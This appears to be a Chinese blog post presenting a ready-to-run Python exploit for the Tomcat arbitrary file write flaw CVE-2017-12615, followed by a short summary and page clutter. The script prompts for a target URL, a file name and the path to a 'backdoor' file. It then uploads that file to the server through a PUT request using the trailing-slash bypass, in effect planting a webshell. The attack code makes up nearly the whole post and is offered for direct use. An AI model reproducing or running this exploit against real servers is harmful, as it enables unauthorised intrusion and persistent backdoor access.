import sys
import requests
def title():
print("[-------------------------------------------------------------]")
print("[-------------- Tomcat 文件写入漏洞 ---------------]")
print("[-------- CVE-2017-12615 ----------]")
print("[-------- use:python3 CVE-2017-12615.py --------]")
print("[-------- Author:鸣蜩十四 ------------]")
print("[-------------------------------------------------------------]")
def main() :
if (len(sys.argv)==1):
url = input("请输入目标网站地址(http://ip:port/):")
name = input("请为上传文件命名:")
path = input("请输入后门的绝对地址:")
poc(url,name,path)
else :
print("Example: \n python3 " + sys.argv[0] + "\n")
def poc(url,name,path) :
r = requests.put(url=url+name+'/',data=open(path, 'rb'),verify=False)
if r.status_code == 201 :
print("[+] 可能存在 Tomcat写入漏洞,请从网页查看是否上传成功")
else :
print("[-] 不存在该漏洞!")
if __name__ == "__main__" :
title()
main()
Tomcat文件写入 CVE-2017-12615 EXP
最新推荐文章于 2026-01-03 22:47:49 发布
该脚本是一个Python程序,用于检测目标网站是否存在Tomcat文件写入漏洞(CVE-2017-12615)。用户需提供目标URL、上传文件名和后门的绝对路径,程序通过PUT请求尝试写入文件,并根据HTTP响应状态码判断漏洞是否存在。
Python3.8
Conda
Python
Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本
您可能感兴趣的与本文相关的镜像
Python3.8
Conda
Python
Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本
1121

被折叠的 条评论
为什么被折叠?



